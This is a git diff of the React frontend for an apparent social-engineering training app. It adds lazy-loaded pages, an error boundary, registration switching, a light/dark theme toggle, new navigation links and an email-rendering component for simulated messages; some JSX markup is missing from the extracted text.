Layout +import RegisterPage from './pages/RegisterPage'; import Layout from './components/Layout'; -import ProtectedRoute from './components/ProtectedRoute'; // 
Added for new routes +import ProtectedRoute from './components/ProtectedRoute'; +import ErrorBoundary from './components/ErrorBoundary'; + +// Lazy loaded pages +const DashboardPage = lazy(() => import('./pages/DashboardPage')); +const ScenariosPage = lazy(() => import('./pages/ScenariosPage')); +const QuizzesPage = lazy(() => import('./pages/QuizzesPage')); +const QuizPlayerPage = lazy(() => import('./pages/QuizPlayerPage')); +const SimulationsPage = lazy(() => import('./pages/SimulationsPage')); +const SimulationPlayerPage = lazy(() => import('./pages/SimulationPlayerPage')); +const AIChatPage = lazy(() => import('./pages/AIChatPage')); +const SettingsPage = lazy(() => import('./pages/SettingsPage')); +const InstallerPage = lazy(() => import('./pages/InstallerPage')); +const ProfilePage = lazy(() => import('./pages/ProfilePage')); +const GlossaryPage = lazy(() => import('./pages/GlossaryPage')); +const LeaderboardPage = lazy(() => import('./pages/LeaderboardPage')); +const AnalyticsPage = lazy(() => import('./pages/AnalyticsPage')); +const CampaignsPage = lazy(() => import('./pages/CampaignsPage')); +const ScenarioBuilderPage = lazy(() => import('./pages/ScenarioBuilderPage')); +const DebriefPage = lazy(() => import('./pages/DebriefPage')); +const CertificatePage = lazy(() => import('./pages/CertificatePage')); + +function PageLoader() { + return ( +
+
LOADING...
+
+ ); +} function App() { const [isAuthenticated, setIsAuthenticated] = useState(false); const [isLoading, setIsLoading] = useState(true); const [firstRunCompleted, setFirstRunCompleted] = useState(true); + const [showRegister, setShowRegister] = useState(false); useEffect(() => { - // Check for auth token const token = localStorage.getItem('soceng_token'); if (token) { setIsAuthenticated(true); } - // Check first run status - skip if already has token (for testing/production) const firstRun = localStorage.getItem('soceng_first_run'); if (!firstRun && !token) { setFirstRunCompleted(false); } + // Apply saved theme + const savedTheme = localStorage.getItem('soceng_theme') || 'dark'; + document.documentElement.classList.toggle('light', savedTheme === 'light'); + setIsLoading(false); }, []); @@ -53,45 +72,71 @@ function App() { if (!firstRunCompleted) { return ( - - - { - setFirstRunCompleted(true); - localStorage.setItem('soceng_first_run', 'true'); - }} /> - + + + + }> + { + setFirstRunCompleted(true); + localStorage.setItem('soceng_first_run', 'true'); + }} /> + + + ); } if (!isAuthenticated) { return ( - - - setIsAuthenticated(true)} /> - + + + + {showRegister ? 
( + setIsAuthenticated(true)} + onSwitchToLogin={() => setShowRegister(false)} + /> + ) : ( + setIsAuthenticated(true)} + onSwitchToRegister={() => setShowRegister(true)} + /> + )} + + ); } return ( - - - setIsAuthenticated(false)}> - - } /> - } /> - } /> - } /> - } /> - } /> - } /> - } /> - } /> - } /> - } /> - - - + + + + setIsAuthenticated(false)}> + }> + + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + + + + + ); } -export default App; \ No newline at end of file +export default App; diff --git a/frontend/src/components/EmailRenderer.js b/frontend/src/components/EmailRenderer.js new file mode 100644 index 0000000..94857a6 --- /dev/null +++ b/frontend/src/components/EmailRenderer.js @@ -0,0 +1,69 @@ +import React from 'react'; +import { Star, Reply, Forward, Trash2, MoreHorizontal, Paperclip } from 'lucide-react'; + +export default function EmailRenderer({ email }) { + const { from, to, subject, body, date, attachments, cc } = email || {}; + + return ( +
+ {/* Email Header Bar */} +
+
+ + + +
+ +
+ + {/* Subject */} +
+

{subject || 'No Subject'}

+
+ + {/* Sender Info */} +
+
+
+ {(from || 'U').charAt(0).toUpperCase()} +
+
+
+ {from || 'Unknown Sender'} +
+

+ to {to || 'me'} + {cc && , cc: {cc}} +

+
+
+
+ {date || new Date().toLocaleString()} + +
+
+ + {/* Body */} +
+
+ {body || 'No content'} +
+
+ + {/* Attachments */} + {attachments && attachments.length > 0 && ( +
+
+ {attachments.map((att, idx) => ( +
+ + {att.name || `attachment_${idx + 1}`} + {att.size || ''} +
+ ))} +
+
+ )} +
+ ); +} diff --git a/frontend/src/components/ErrorBoundary.js b/frontend/src/components/ErrorBoundary.js new file mode 100644 index 0000000..713062c --- /dev/null +++ b/frontend/src/components/ErrorBoundary.js @@ -0,0 +1,48 @@ +import React from 'react'; + +class ErrorBoundary extends React.Component { + constructor(props) { + super(props); + this.state = { hasError: false, error: null }; + } + + static getDerivedStateFromError(error) { + return { hasError: true, error }; + } + + componentDidCatch(error, errorInfo) { + console.error('ErrorBoundary caught:', error, errorInfo); + } + + render() { + if (this.state.hasError) { + return ( +
+
+
!
+

SYSTEM ERROR

+

+ Something went wrong. The application encountered an unexpected error. +

+
+              {this.state.error?.message || 'Unknown error'}
+            
+ +
+
+ ); + } + + return this.props.children; + } +} + +export default ErrorBoundary; diff --git a/frontend/src/components/Layout.js b/frontend/src/components/Layout.js index fe873bf..26fb79e 100644 --- a/frontend/src/components/Layout.js +++ b/frontend/src/components/Layout.js @@ -1,21 +1,30 @@ -import React from 'react'; +import React, { useState } from 'react'; import { Link, useLocation } from 'react-router-dom'; import { useTranslation } from 'react-i18next'; import { Button } from './ui/button'; -import { Terminal, LayoutDashboard, FileCode, ListChecks, Activity, Settings, LogOut, BookOpen } from 'lucide-react'; +import NotificationBell from './NotificationBell'; +import { + Terminal, LayoutDashboard, FileCode, ListChecks, Activity, Settings, LogOut, BookOpen, + Trophy, BarChart3, Flag, Pencil, Zap, Sun, Moon, User +} from 'lucide-react'; export default function Layout({ children, onLogout }) { const { t } = useTranslation(); const location = useLocation(); + const [theme, setTheme] = useState(localStorage.getItem('soceng_theme') || 'dark'); const navigation = [ { name: t('nav.dashboard'), path: '/', icon: LayoutDashboard }, { name: t('nav.scenarios'), path: '/scenarios', icon: FileCode }, { name: t('nav.quizzes'), path: '/quizzes', icon: ListChecks }, - { name: t('nav.ai_challenge'), path: '/ai-challenge', icon: Activity }, + { name: t('nav.ai_challenge'), path: '/ai-challenge', icon: Zap }, + { name: 'Campaigns', path: '/campaigns', icon: Flag }, { name: t('nav.history'), path: '/simulations', icon: Activity }, + { name: 'Leaderboard', path: '/leaderboard', icon: Trophy }, + { name: 'Analytics', path: '/analytics', icon: BarChart3 }, + { name: 'Scenario Builder', path: '/scenario-builder', icon: Pencil }, { name: t('nav.glossary', 'Glossary'), path: '/glossary', icon: BookOpen }, - { name: t('nav.settings'), path: '/settings', icon: Settings } + { name: t('nav.settings'), path: '/settings', icon: Settings }, ]; const handleLogout = () => { @@ -24,6 +33,13 @@ 
export default function Layout({ children, onLogout }) { onLogout(); }; + const toggleTheme = () => { + const newTheme = theme === 'dark' ? 'light' : 'dark'; + setTheme(newTheme); + localStorage.setItem('soceng_theme', newTheme); + document.documentElement.classList.toggle('light', newTheme === 'light'); + }; + return (
{/* Global Scanlines Overlay */} @@ -49,7 +65,7 @@ export default function Layout({ children, onLogout }) {
{/* Navigation */} -